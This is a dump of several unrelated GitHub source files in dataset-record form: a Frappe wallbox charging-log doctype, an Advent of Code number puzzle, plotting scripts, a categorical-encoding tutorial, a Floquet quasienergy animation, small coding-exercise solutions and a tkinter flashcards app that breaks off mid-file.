wallbox_doc.endpoint_url\n\t\t\tend = \"getLog\"\n\t\t\twallbox_name = wallbox_doc.name\n\t\t\tdata = self.get_request(url,end)\n\t\t\tfor el in data[\"list\"]:\n\n\t\t\t\tdate = datetime.fromtimestamp(el[\"timestamp\"])-timedelta(hours=1)\n\t\t\t\tprint(date)\n\n\t\t\t\tduration = timedelta(milliseconds =el[\"duration\"])\n\t\t\t\tenergy = el[\"energy\"]\n\t\t\t\tcosts = round(el[\"price\"]*el[\"energy\"]/100,2)\n\t\t\t\tprint(date,duration,costs)\n\t\t\t\tlogfile_list = frappe.get_all(\"Charging process\", filters={\"date\": date})\n\t\t\t\tif not logfile_list:\n\n\t\t\t\t\tlogfile_doc = frappe.get_doc({\n\t\t\t\t\t\t\t\"doctype\": \"Charging process\",\n\t\t\t\t\t\t\t\"user\": el[\"username\"],\n\t\t\t\t\t\t\t\"user_id\" : el[\"uid\"],\n\t\t\t\t\t\t\t\"date\": date,\n\t\t\t\t\t\t\t\"duration\": duration,\n\t\t\t\t\t\t\t\"energy\" : energy,\n\t\t\t\t\t\t\t\"costs\" : costs,\n\t\t\t\t\t\t\t\"wallbox_name\": wallbox_name\n\t\t\t\t\t\t\t})\n\t\t\t\t\tlogfile_doc.save()\n\t\t\n\t@frappe.whitelist()\n\tdef get_wallbox(self):\n\t\t\n\t\twallbox_list = frappe.get_all(\"Wallbox\")\n\t\tprint(wallbox_list)\n\t\tfor el in wallbox_list:\n\t\t\twallbox_doc = frappe.get_doc(\"Wallbox\",el[\"name\"])\n\t\t\turl = wallbox_doc.endpoint_url\n\t\t\tend = \"getParameters\"\n\t\t\tparameters = self.get_request(url,end)\n\t\t\tprint(parameters[\"list\"])\n\t\t\tif parameters[\"list\"][0][\"vehicleState\"] == 1:\n\t\t\t\tveh_st = \"ready\"\n\t\t\telif parameters[\"list\"][0][\"vehicleState\"] == 2:\n\t\t\t\tveh_st = \"Vehicle detected\"\n\t\t\telif parameters[\"list\"][0][\"vehicleState\"] == 3:\n\t\t\t\tveh_st = \"Vehicle charging\"\n\t\t\telif parameters[\"list\"][0][\"vehicleState\"] == 5:\n\t\t\t\tveh_st = \"Error\"\n\t\t\tif parameters[\"list\"][0][\"evseState\"] == True:\n\t\t\t\tevse_st = \"Charging station unlocked\"\n\t\t\telif parameters[\"list\"][0][\"evseState\"] == False:\n\t\t\t\tevse_st = \"Charging station locked\"\n\t\t\t\n\t\t\twallbox_doc.vehicle_state = veh_st\n\t\t\twallbox_doc.evse_state = evse_st\n\t\t\twallbox_doc.duration = timedelta(milliseconds =parameters[\"list\"][0][\"duration\"])\n\t\t\twallbox_doc.max_current = parameters[\"list\"][0][\"maxCurrent\"]\n\t\t\twallbox_doc.actual_current_in_a = parameters[\"list\"][0][\"actualCurrent\"]\n\t\t\twallbox_doc.actual_power = parameters[\"list\"][0][\"actualPower\"]\n\t\t\twallbox_doc.always_active = parameters[\"list\"][0][\"alwaysActive\"]\n\t\t\twallbox_doc.last_action_user = parameters[\"list\"][0][\"lastActionUser\"]\n\t\t\twallbox_doc.last_action_uid = parameters[\"list\"][0][\"lastActionUID\"]\n\t\t\twallbox_doc.energy = parameters[\"list\"][0][\"energy\"]\n\t\t\twallbox_doc.mileage = parameters[\"list\"][0][\"mileage\"]\n\t\t\twallbox_doc.meter_reading = parameters[\"list\"][0][\"meterReading\"]\n\t\t\twallbox_doc.save()\n\t\t\n\t\t\n\t\t \t\t\t\t\n\t\t\n\t\t\n\n\t \t\n\n\n\t\t\n\n\t\n\n\n","repo_name":"itsdaveit/its_charging","sub_path":"its_charging/its_charging/doctype/ist_charging_func/ist_charging_func.py","file_name":"ist_charging_func.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38493674437","text":"from collections import Counter\nimport common.input_data as input_data\nSums = dict[int, Counter[int]]\ndef find_first_wrong_number(numbers: list[int]) -> int:\n sums = make_sums(numbers[:25])\n numbers_to_check = list(numbers)\n while numbers_to_check:\n new_number = numbers_to_check[25]\n if not is_valid_number(new_number, sums):\n return new_number\n number = numbers_to_check.pop(0)\n remove_from_sums(number, sums)\n add_to_sums(new_number, sums)\n\n raise RuntimeError(\"Should not reach here, no number was detected as valid\")\n\ndef is_valid_number(number: int, sums: Sums) -> bool:\n return any(sum_counter[number] != 0 for sum_counter in sums.values())\n\ndef remove_from_sums(number: int, sums: Sums):\n del sums[number]\n for number2, sum_counter in sums.items():\n sum_counter[number + number2] -= 1\n\ndef add_to_sums(number: int, sums: Sums):\n new_sums = Counter(number + number2 for number2 in sums)\n for number2, sum_counter in sums.items():\n sum_counter[number + number2] += 1\n sums[number] = new_sums\n\ndef make_sums(numbers: list[int]) -> Sums:\n sums: Sums = {}\n for index1, number in enumerate(numbers):\n sums[number] = Counter(number + num2\n for index2, num2 in enumerate(numbers)\n if index1 != index2)\n return sums\n\ndef find_encryption_weakness(numbers: list[int]) -> int:\n invalid_number = find_first_wrong_number(numbers)\n candidate_range: list[int] = []\n numbers_to_check = list(numbers)\n while numbers_to_check:\n sum_value = sum(candidate_range)\n if sum_value == invalid_number and len(candidate_range) > 1:\n return min(candidate_range) + max(candidate_range)\n if sum_value < invalid_number:\n candidate_range.append(numbers_to_check.pop(0))\n if sum_value > invalid_number:\n candidate_range.pop(0)\n\n raise RuntimeError(\"Cannot find an encryption weakness\")\n\n\nNUMBERS = input_data.read(\"input/input9.txt\", int)\n\nif __name__ == \"__main__\":\n print(f\"First number that's wrong: {find_first_wrong_number(NUMBERS)}\")\n\n print(f\"Encryption Weakness: {find_encryption_weakness(NUMBERS)}\")\n","repo_name":"pviafore/AdventOfCode2020","sub_path":"challenge9.py","file_name":"challenge9.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"69984091254","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport os\n\n\n# Función para generar gráficos a partir de datos de rendimiento computacional.\ndef generar_graficas(directorio, archivo_csv, prefijo):\n datos = pd.read_csv(os.path.join(directorio, archivo_csv))\n datos_filtrados = datos[datos[\"TotalCores\"] > 1] # Filtra para TotalCores > 1\n\n # Gráfico de Speedup vs. TotalCores\n plt.figure(figsize=(10, 7))\n for size in sorted(datos_filtrados[\"MatrixSize\"].unique()):\n subset = datos_filtrados[datos_filtrados[\"MatrixSize\"] == size]\n plt.plot(\n subset[\"TotalCores\"], subset[\"Speedup\"], marker=\"o\", label=f\"Tamaño {size}\"\n )\n plt.xlabel(\"Total de Núcleos\")\n plt.ylabel(\"Speedup\")\n plt.title(\"Speedup vs. Total de Núcleos\")\n plt.legend()\n plt.savefig(\n os.path.join(directorio, f\"{prefijo}Speedup_vs_TotalCores.pdf\"), format=\"pdf\"\n )\n\n # Gráfico de Eficiencia vs. TotalCores\n plt.figure(figsize=(10, 8))\n for size in sorted(datos_filtrados[\"MatrixSize\"].unique()):\n subset = datos_filtrados[datos_filtrados[\"MatrixSize\"] == size]\n plt.plot(\n subset[\"TotalCores\"],\n subset[\"Eficiencia\"],\n marker=\"o\",\n label=f\"Tamaño {size}\",\n )\n plt.xlabel(\"Total de Núcleos\")\n plt.ylabel(\"Eficiencia\")\n plt.title(\"Eficiencia vs. Total de Núcleos\")\n plt.legend()\n plt.savefig(\n os.path.join(directorio, f\"{prefijo}Eficiencia_vs_TotalCores.pdf\"), format=\"pdf\"\n )\n\n # Gráfico de Tiempo vs. TotalCores para diferentes tamaños de matriz\n plt.figure(figsize=(10, 8))\n for size in sorted(datos[\"MatrixSize\"].unique()):\n subset = datos[datos[\"MatrixSize\"] == size]\n plt.plot(\n subset[\"TotalCores\"], subset[\"Time\"], marker=\"o\", label=f\"Tamaño {size}\"\n )\n plt.xlabel(\"Total de Núcleos\")\n plt.ylabel(\"Tiempo (microsegundos)\")\n plt.title(\n \"Tiempo de Ejecución vs. Total de Núcleos para diferentes tamaños de Matriz\"\n )\n plt.legend()\n plt.savefig(\n os.path.join(directorio, f\"{prefijo}Time_vs_TotalCores.pdf\"), format=\"pdf\"\n )\n\n # Repetir para otros gráficos y guardarlos en formato PDF\n\n\n# Solicita al usuario ingresar la ruta del directorio y un prefijo para los nombres de los archivos de gráficos\ndirectorio = input(\n \"Por favor, ingresa la ruta del directorio donde se encuentran los archivos: \"\n)\nprefijo = input(\n \"Por favor, ingresa el prefijo para los nombres de los archivos de gráficos: \"\n)\narchivo_csv = \"resultados_con_metricas.csv\"\n\n# Llama a la función para generar y guardar las gráficas\ngenerar_graficas(directorio, archivo_csv, prefijo)\n\n# Mensaje para informar al usuario que los gráficos han sido generados y guardados.\nprint(\n \"Todos los gráficos han sido generados y guardados como archivos .pdf en el directorio proporcionado.\"\n)\n","repo_name":"sergioarojasm98/Multiplicacion-de-Matrices-con-OpenMP","sub_path":"Data-Analytics-Scripts/hpc_plots.py","file_name":"hpc_plots.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71817507892","text":"import re\r\n\r\nendereco = \"Rua do Barulho 409, apartamente 323,\" \\\r\n \" Cidade, Estado, ES, 95085020\"\r\n\r\npadrao = re.compile(\"[0-9]{5}[-]?[0-9]{3}\")\r\n\r\nbusca = padrao.search(endereco)\r\nif busca:\r\n cep = busca.group()\r\n print(cep)\r\n","repo_name":"ArantesVini/extrator_url","sub_path":"extrator_cep.py","file_name":"extrator_cep.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4965777971","text":"\"\"\" \r\nCount or frequency encoding\r\n- In count encoding we replace the categories by the count of the observations that show that category in the dataset. \r\n- Similarly, we can replace the category by the frequency or percentage of observations in the dataset. \r\n- That is, if 10 of our 100 observations show the colour blue, we would replace blue by 10 if doing count encoding, or by 0.1 if replacing by the frequency. \r\n- These techniques capture the representation of each label in a dataset, but the encoding may not necessarily be predictive of the outcome. \r\n- These are however, very popular encoding methods in Kaggle competitions.\r\n\r\nThe assumption of this technique is that the number observations shown by each variable is somewhat informative of the predictive power of the category.\r\n\r\nAdvantages\r\n- Simple\r\n- Does not expand the feature space\r\n\r\nDisadvantages\r\n- If 2 different categories appear the same amount of times in the dataset, that is, they appear in the same number of observations, they will be replaced by the same number: may lose valuable information.\r\n- For example, if there are 10 observations for the category blue and 10 observations for the category red, both will be replaced by 10, and therefore, after the encoding, will appear to be the same thing.\r\n\r\nIn this example:\r\nWe will see how to perform count or frequency encoding with:\r\n- pandas\r\n\r\nAnd the advantages and limitations of each implementation using the House Prices dataset.\r\n \"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n# load dataset\r\ndata = pd.read_csv('dataset/house-prices-advanced-regression-techniques/train.csv',\r\n usecols=['Neighborhood', 'Exterior1st', 'Exterior2nd', 'SalePrice'])\r\n\r\ndata.head()\r\n\"\"\" Neighborhood Exterior1st Exterior2nd SalePrice\r\n0 CollgCr VinylSd VinylSd 208500\r\n1 Veenker MetalSd MetalSd 181500\r\n2 CollgCr VinylSd VinylSd 223500\r\n3 Crawfor Wd Sdng Wd Shng 140000\r\n4 NoRidge VinylSd VinylSd 250000 \"\"\"\r\n\r\n# let's have a look at how many labels each variable has\r\nfor col in data.columns:\r\n print(col, ': ', len(data[col].unique()), ' labels')\r\n\r\n\"\"\" Neighborhood : 25 labels\r\nExterior1st : 15 labels\r\nExterior2nd : 16 labels\r\nSalePrice : 663 labels \"\"\"\r\n\r\n\"\"\" \r\nImportant\r\n- When doing count transformation of categorical variables, it is important to calculate the count (or frequency = count / total observations) over the training set, and then use those numbers to replace the labels in the test set.\r\n \"\"\"\r\n# let's separate into training and testing set\r\nX_train, X_test, y_train, y_test = train_test_split(\r\n data[['Neighborhood', 'Exterior1st', 'Exterior2nd']], # predictors\r\n data['SalePrice'], # target\r\n test_size=0.3, # percentage of obs in test set\r\n random_state=0) # seed to ensure reproducibility\r\n\r\nX_train.shape, X_test.shape\r\n((1022, 3), (438, 3))\r\n\r\n\"\"\" Count and Frequency encoding with pandas \"\"\"\r\n\r\n# let's obtain the counts for each one of the labels in the variable Neigbourhood\r\n\r\ncount_map = X_train['Neighborhood'].value_counts().to_dict()\r\n\r\ncount_map\r\n\"\"\" {'NAmes': 151,\r\n 'CollgCr': 105,\r\n 'OldTown': 73,\r\n 'Edwards': 71,\r\n 'Sawyer': 61,\r\n 'Somerst': 56,\r\n 'Gilbert': 55,\r\n 'NridgHt': 51,\r\n 'NWAmes': 51,\r\n 'SawyerW': 45,\r\n 'BrkSide': 41,\r\n 'Mitchel': 36,\r\n 'Crawfor': 35,\r\n 'Timber': 30,\r\n 'NoRidge': 30,\r\n 'ClearCr': 24,\r\n 'IDOTRR': 24,\r\n 'SWISU': 18,\r\n 'StoneBr': 16,\r\n 'Blmngtn': 12,\r\n 'MeadowV': 12,\r\n 'BrDale': 10,\r\n 'NPkVill': 7,\r\n 'Veenker': 6,\r\n 'Blueste': 2} \"\"\"\r\n\r\n# The dictionary contains the number of observations per category in Neighbourhood.\r\n\r\n# replace the labels with the counts\r\nX_train['Neighborhood'] = X_train['Neighborhood'].map(count_map)\r\nX_test['Neighborhood'] = X_test['Neighborhood'].map(count_map)\r\n\r\n# let's explore the result\r\nX_train['Neighborhood'].head(10)\r\n\"\"\" 64 105\r\n682 24\r\n960 41\r\n1384 71\r\n1100 18\r\n416 61\r\n1034 35\r\n853 151\r\n472 71\r\n1011 71\r\nName: Neighborhood, dtype: int64 \"\"\"\r\n\r\n# if instead of the count we would like the frequency\r\n# we need only divide the count by the total number of observations:\r\n\r\nfrequency_map = (X_train['Exterior1st'].value_counts() / len(X_train) ).to_dict()\r\nfrequency_map\r\n\"\"\" {'VinylSd': 0.3561643835616438,\r\n 'HdBoard': 0.149706457925636,\r\n 'Wd Sdng': 0.14481409001956946,\r\n 'MetalSd': 0.1350293542074364,\r\n 'Plywood': 0.08414872798434442,\r\n 'CemntBd': 0.03816046966731898,\r\n 'BrkFace': 0.03424657534246575,\r\n 'WdShing': 0.02054794520547945,\r\n 'Stucco': 0.016634050880626222,\r\n 'AsbShng': 0.014677103718199608,\r\n 'Stone': 0.0019569471624266144,\r\n 'BrkComm': 0.0009784735812133072,\r\n 'ImStucc': 0.0009784735812133072,\r\n 'CBlock': 0.0009784735812133072,\r\n 'AsphShn': 0.0009784735812133072} \"\"\"\r\n\r\n# replace the labels with the frequencies\r\n\r\nX_train['Exterior1st'] = X_train['Exterior1st'].map(frequency_map)\r\nX_test['Exterior1st'] = X_test['Exterior1st'].map(frequency_map)\r\n\r\n# We can then put these commands into 2 functions as we did in the previous 3 examples, and loop over all the categorical variables.\r\n# If you don't know how to do this, please check any of the previous examples.","repo_name":"Akshaykumarcp/ML-Feature-Engineering","sub_path":"0.4_categorical encoding/0.4_count_or_frequency_encoding.py","file_name":"0.4_count_or_frequency_encoding.py","file_ext":"py","file_size_in_byte":5246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23445039630","text":"import numpy as np\r\nimport matplotlib.pyplot as plt \r\nimport cmath \r\nimport math\r\nimport functools\r\nfrom scipy.linalg import expm\r\nimport seaborn as sns\r\nimport pandas as pd \r\nfrom mpl_toolkits.mplot3d import Axes3D \r\nimport matplotlib.animation as animation\r\n\r\n#parameters\r\nT = 20\r\nJ1 = (np.pi/2)/(np.sqrt(2))\r\nJ2 = (np.pi/4)/(np.sqrt(2))\r\nd = 4\r\nnx = 2\r\nny = 2\r\nNx = 20\r\nNy = 20\r\nv = 1\r\nkx_array = np.linspace(-np.pi,np.pi,Nx+1)\r\nky_array = np.linspace(-np.pi,np.pi,Ny+1)\r\n# print(ky_array)\r\nt_array = np.linspace(0.001*T,0.999*T,11)\r\ngap = 0\r\nlx = len(kx_array)-1\r\nly = len(ky_array)-1\r\nlt = len(t_array)\r\ntheta_array = np.linspace(np.pi/2,np.pi/2,1)\r\n\r\n#pauli matrix\r\ns0 = np.matrix([[1,0],[0,1]])\r\ns1 = np.matrix([[0,1],[1,0]])\r\ns2 = np.matrix([[0,-1j],[1j,0]])\r\ns3 = np.matrix([[1,0],[0,-1]])\r\n\r\n#generalized logarithm\r\ndef llog(z, theta):\r\n modulus = np.abs(z)\r\n argument = np.angle(z)\r\n if theta-2*np.pi <= argument < theta:\r\n argument = argument\r\n else:\r\n argument = theta-2*np.pi+np.mod(argument-theta, 2*np.pi)\r\n return np.log(modulus) + 1j*argument\r\n\r\n#states-sorting function\r\ndef ssort(x,y):\r\n e = -1j*np.log(x)\r\n x_sort_idx = np.argsort(e)[::-1]\r\n e = np.sort(e)[::-1]\r\n xx = [0 for index in range(len(x))]\r\n for i in range(len(x)):\r\n xx[i] = np.exp(1j*e[i])\r\n y = y[:,x_sort_idx]\r\n x = xx\r\n return x,y\r\n\r\ndef SSort(x,y):\r\n e = []\r\n for X in x:\r\n if gap == 0:\r\n E = -1j*llog(X,0)/T\r\n if gap == np.pi:\r\n E = -1j*llog(X,np.pi)/T\r\n e.append(E)\r\n x_sort_idx = np.argsort(e)[::1]\r\n e = np.sort(e)[::1]\r\n y = y[:,x_sort_idx]\r\n x = e\r\n return x,y\r\n\r\n#phase-fixing function\r\ndef fix(x,d):\r\n Phase = np.zeros(shape=(d,d),dtype=complex)\r\n for j in range(d):\r\n Phase[j,j] = np.exp(-1j*cmath.phase(x[0,j]))\r\n x = np.dot(x,Phase)\r\n return x\r\n\r\n#anomalous periodic operator\r\ndef U(kx,ky,t,theta):\r\n #Hamiltonians\r\n H1 = (2*J1/T)*(np.kron(s1,s0)-np.kron(s2,s2))+(0*2/T)*(np.sin(ny*ky)*np.kron(s3,s1)+np.cos(ny*ky)*np.kron(s3,s2)-0.4*np.cos(ny*ky)*np.kron(s0,s0))+(0.0001)*np.kron(s3,s0)\r\n H2 = (2*J2/T)*((np.cos(theta)*np.cos(kx)+np.sin(theta)*np.cos(nx*kx))*np.kron(s1,s0)-(np.cos(theta)*np.sin(kx)+np.sin(theta)*np.sin(nx*kx))*np.kron(s2,s3)-(np.cos(theta)*np.cos(ky)+np.sin(theta)*np.cos(ny*ky))*np.kron(s2,s2)-(np.cos(theta)*np.sin(ky)+np.sin(theta)*np.sin(ny*ky))*np.kron(s2,s1))+(0.0001)*np.kron(s3,s0)\r\n #Floquet operator\r\n UF = np.dot(expm(-1j*H1*(T/4)),np.dot(expm(-1j*H2*(T/2)),expm(-1j*H1*(T/4))))\r\n #sort by quasienergies\r\n eval,evec = np.linalg.eig(UF)\r\n evec = fix(evec,d)\r\n eval,evec = ssort(eval,evec)\r\n #fix phase\r\n\r\n #evolution operator\r\n r = int(t//T)\r\n\r\n if 0 <= t%T < T/4:\r\n U1 = np.dot(expm(-1j*H1*(t%T)),np.linalg.matrix_power(UF,r))\r\n if T/4 <= t%T < 3*T/4:\r\n U1 = np.dot(expm(-1j*H2*(t%T-T/4)),np.dot(expm(-1j*H1*(T/4)),np.linalg.matrix_power(UF,r)))\r\n if 3*T/4 <= t%T < T:\r\n U1 = np.dot(expm(-1j*H1*(t%T-3*T/4)),np.dot(expm(-1j*H2*(T/2)),np.dot(expm(-1j*H1*(T/4)),np.linalg.matrix_power(UF,r))))\r\n \r\n #anomalous periodic operator for two gaps\r\n if gap == 0:\r\n Eaval = [0 for index in range(len(eval))]\r\n for i in range(len(eval)):\r\n Eaval[i] = np.exp(-llog(eval[i],0)*(t/T))\r\n Smatpi = np.diag(Eaval)\r\n U2 = np.dot(evec, np.dot(Smatpi, np.linalg.inv(evec)))\r\n if gap == np.pi:\r\n Eaval = [0 for index in range(len(eval))]\r\n for i in range(len(eval)):\r\n Eaval[i] = np.exp(-llog(eval[i],np.pi)*(t/T))\r\n Smatpi = np.diag(Eaval)\r\n U2 = np.dot(evec, np.dot(Smatpi, np.linalg.inv(evec)))\r\n return np.dot(U1,U2)\r\n\r\nfor theta in theta_array:\r\n Kx_array = kx_array.tolist()\r\n Ky_array = ky_array.tolist()\r\n del(Kx_array[-1])\r\n del(Ky_array[-1])\r\n X, Y = np.meshgrid(Kx_array, Ky_array) \r\n EIG1 = []\r\n EIG2 = []\r\n for t in t_array:\r\n eigmatrix1 = np.zeros((lx,ly))\r\n eigmatrix2 = np.zeros((lx,ly))\r\n for i in range(lx):\r\n for j in range(ly):\r\n kx = kx_array[i]\r\n ky = ky_array[j]\r\n eigenvalue, eigenvector = np.linalg.eig(U(kx,ky,t,theta))\r\n quasienergy, eigenvector = SSort(eigenvalue,eigenvector)\r\n eigmatrix1[i,j] = (quasienergy[0]).real\r\n eigmatrix2[i,j] = (quasienergy[3]).real\r\n EIG1.append(eigmatrix1)\r\n EIG2.append(eigmatrix2)\r\n \r\n fig, ax = plt.subplots(tight_layout=True, figsize=(6, 6), subplot_kw=dict(projection='3d'))\r\n plot1 = [ax.plot_surface(X, Y, EIG1[0], cmap=plt.get_cmap('plasma'), linewidth=0)]\r\n plot2 = [ax.plot_surface(X, Y, EIG2[0], cmap=plt.get_cmap('plasma'), linewidth=0)]\r\n ax.set_xlabel('kx', fontsize=10, color='black') \r\n ax.set_ylabel('ky', fontsize=10, color='black') \r\n ax.set_zlabel('quasienergy', fontsize=10, color='black')\r\n\r\n\r\n ax.view_init(50, 120) \r\n\r\n def update_map1(num, z, plot):\r\n plot[0].remove()\r\n plot[0] = ax.plot_surface(X, Y, EIG1[num], cmap=plt.get_cmap('plasma'), linewidth=0)\r\n \r\n def update_map2(num, z, plot):\r\n plot[0].remove()\r\n plot[0] = ax.plot_surface(X, Y, EIG2[num], cmap=plt.get_cmap('plasma'), linewidth=0)\r\n\r\n ani1 = animation.FuncAnimation(fig, update_map1, 30, interval=500, fargs=(EIG1, plot1), repeat=True)\r\n ani2 = animation.FuncAnimation(fig, update_map2, 30, interval=500, fargs=(EIG2, plot2), repeat=True)\r\n plt.show()","repo_name":"Hiloxik/FBOTP","sub_path":"Total Codes/dynamical singularity-animation.py","file_name":"dynamical singularity-animation.py","file_ext":"py","file_size_in_byte":5546,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"5966355834","text":"# https://programmers.co.kr/learn/courses/30/lessons/42576\r\n\r\ndef solution(participant, completion):\r\n participant.sort()\r\n completion.sort()\r\n for i in range(len(completion)):\r\n if completion[i] != participant[i]:\r\n return participant[i]\r\n length = i + 1\r\n \r\n if length == len(participant):\r\n return ''\r\n else:\r\n return participant[length]\r\n ","repo_name":"kylew1004/algorithm","sub_path":"Programmers/코딩테스트 고득점 kit/해시/완주하지_못한_선수.py","file_name":"완주하지_못한_선수.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28230181276","text":"'''\nGive a string, you can choose to split the string after one character or two adjacent characters, and make the string to be composed of only one character or two characters. \nOutput all possible results.\n\nHave you met this question in a real interview? \nExample\nGiven the string \"123\"\nreturn [[\"1\",\"2\",\"3\"],[\"12\",\"3\"],[\"1\",\"23\"]]\n'''\n\nclass Solution:\n \"\"\"\n @param: : a string to be split\n @return: all possible split string array\n \"\"\"\n\n def splitString(self, s):\n # write your code here\n res = []\n self.helper(s, res, [])\n return res\n \n def helper(self, s, res, cur):\n if len(s) == 0:\n res.append(cur[:])\n\n for i in range(2):\n if i + 1 <= len(s):\n cur.append(s[:i + 1])\n self.helper(s[i+1:], res, cur)\n cur.pop()\n\ns = Solution()\nstr = '123'\nprint(s.splitString(str))","repo_name":"zsmountain/lintcode","sub_path":"python/combination/680_split_string.py","file_name":"680_split_string.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28717851377","text":"import random\nimport threading\nimport tkinter.messagebox\nimport typing\nfrom tkinter import Canvas, PhotoImage, DISABLED\nfrom tkinter.ttk import Button, Label\n\nimport pandas\nfrom ttkthemes import ThemedTk, ThemedStyle\nfrom PIL import Image, ImageTk\n\n# logging.basicConfig(level=logging.WARN)\n\n\nclass FlashCards(ThemedTk):\n BACKGROUND_COLOR = \"#B1DDC6\"\n WIDTH = 800\n HEIGHT = 526\n SCALE = .5\n FONT_LANG = (\"Arial\", 30, 'italic')\n FONT_WORD = ('Arial', 50, 'bold')\n DELAY = 5\n APP_TITLE = \"FlashCards App\"\n\n def __init__(self):\n super().__init__()\n\n # Data elements\n self.card_data: {str: str} = {}\n self.card_data_index: int = 0\n self.all_data: typing.Union[None, pandas.DataFrame] = None\n if not self.load_data():\n exit(0)\n # Timer\n self.timer: typing.Union[threading.Timer, None] = None\n\n # UI elements\n self.style = ThemedStyle()\n self.canvas = Canvas()\n self.images: {str: PhotoImage} = {\n 'right': ImageTk.PhotoImage(Image.open(\"images/right.png\").\n resize((int(100 * self.SCALE), int(100 * self.SCALE)), Image.BILINEAR)),\n 'wrong': ImageTk.PhotoImage(Image.open(\"images/wrong.png\").\n resize((int(100 * self.SCALE), int(100 * self.SCALE)), Image.BILINEAR)),\n 'front': ImageTk.PhotoImage(Image.open(\"images/card_front.png\").\n resize((int(self.WIDTH * self.SCALE), int(self.HEIGHT * self.SCALE)),\n Image.BILINEAR)),\n 'back': ImageTk.PhotoImage(Image.open(\"images/card_back.png\").\n resize((int(self.WIDTH * self.SCALE), int(self.HEIGHT * self.SCALE)),\n Image.BILINEAR))\n }\n self.buttons: {str: Button} = {\n 'right': Button(),\n \"wrong\": Button()\n }\n self.labels: {str: Label} = {\n }\n\n self.card_image = None\n self.card_text_lang = None\n self.card_text_word = None\n\n self.generate_ui()\n self.show_new_card()\n\n def load_data(self) -> bool:\n def load_data_inner() -> bool:\n try:\n self.all_data = pandas.read_csv(file).transpose().to_dict()\n except pandas.errors.EmptyDataError:\n tkinter.messagebox.showerror(message=\"There are no data to learn.\")\n return False\n else:\n return True\n\n try:\n with open('data/words_to_learn.csv', 'r') as file:\n return load_data_inner()\n except FileNotFoundError:\n with open('data/french_words.csv', 'r') as file:\n return load_data_inner()\n\n def save_words_to_learn(self):\n with open('data/words_to_learn.csv', 'w', newline='') as file:\n # to keep the same format default index must be removed from the dataset\n pandas.DataFrame(pandas.DataFrame(self.all_data).transpose()).to_csv(file, index=False)\n\n def button_action_right(self):\n del self.all_data[self.card_data_index]\n self.save_words_to_learn()\n if self.load_data():\n self.show_new_card()\n else:\n for item in self.buttons.values():\n item['state'] = DISABLED\n self.card_data = {'Good Job': 'Nothing to learn.'}\n self.show_flashcard()\n\n def button_action_wrong(self):\n self.show_new_card()\n\n def show_new_card(self):\n if self.timer is not None:\n self.timer.cancel()\n self.timer = threading.Timer(self.DELAY, self.flip_card)\n\n self.card_data_index = random.SystemRandom().randint(0, len(self.all_data)-1)\n self.card_data = self.all_data[self.card_data_index]\n self.show_flashcard()\n self.timer.start()\n\n def flip_card(self):\n self.show_flashcard(side='back')\n\n def show_flashcard(self, side='front'):\n lang = tuple(self.card_data.keys())[0] if side == 'front' else tuple(self.card_data.keys())[-1]\n word = tuple(self.card_data.values())[0] if side == 'front' else tuple(self.card_data.values())[-1]\n self.canvas.itemconfig(self.card_image, image=self.images[side])\n self.canvas.itemconfig(self.card_text_lang, text=lang)\n self.canvas.itemconfig(self.card_text_word, text=word)\n\n self.canvas.update()\n\n def generate_ui(self):\n # logging.info(self.style.get_themes())\n self.title(self.APP_TITLE)\n\n self.config(padx=20, pady=20, background=self.BACKGROUND_COLOR, highlightcolor=self.BACKGROUND_COLOR)\n self.canvas.config(background=self.BACKGROUND_COLOR, width=self.SCALE * self.WIDTH,\n height=self.SCALE * self.HEIGHT,\n highlightthickness=0)\n self.buttons['right'].config(image=self.images['right'], command=self.button_action_right)\n self.buttons['wrong'].config(image=self.images['wrong'], command=self.button_action_wrong)\n\n self.canvas.grid(column=1, row=1, columnspan=2)\n self.buttons['right'].grid(column=1, row=2, columnspan=1, padx=10, pady=10)\n self.buttons['wrong'].grid(column=2, row=2, columnspan=1, padx=10, pady=10)\n\n self.card_image = self.canvas.create_image(self.SCALE * self.WIDTH / 2,\n self.SCALE * self.HEIGHT / 2)\n self.card_text_lang = self.canvas.create_text(self.SCALE * self.WIDTH / 2,\n self.SCALE * (self.HEIGHT / 2 - 150),\n font=self.FONT_LANG)\n self.card_text_word = self.canvas.create_text(self.SCALE * self.WIDTH / 2,\n self.SCALE * (self.HEIGHT / 2 + 100),\n font=self.FONT_WORD)\n\n self.style.set_theme('default')\n self.style.configure('TButton', background=self.BACKGROUND_COLOR,\n highlightcolor=self.BACKGROUND_COLOR, highlightthickness=0)\n\n my_map = [('active', self.BACKGROUND_COLOR),\n ('!active', self.BACKGROUND_COLOR),\n ('alternate', self.BACKGROUND_COLOR),\n ('!alternate', self.BACKGROUND_COLOR),\n ('background', self.BACKGROUND_COLOR),\n ('!background', self.BACKGROUND_COLOR),\n ('disabled', self.BACKGROUND_COLOR),\n ('!disabled', self.BACKGROUND_COLOR),\n ('focus', self.BACKGROUND_COLOR),\n ('!focus', self.BACKGROUND_COLOR),\n ('invalid', self.BACKGROUND_COLOR),\n ('!invalid', self.BACKGROUND_COLOR),\n ('pressed', self.BACKGROUND_COLOR),\n ('!pressed', self.BACKGROUND_COLOR),\n ('selected', self.BACKGROUND_COLOR),\n ('!selected', self.BACKGROUND_COLOR)]\n\n self.style.map('.',\n background=my_map,\n highlightcolor=my_map,\n highlightbackground=my_map,\n activeforeground=my_map,\n activebackground=my_map,\n disabledforeground=my_map,\n indicatoron=my_map,\n )\n self.style.map('TButton',\n 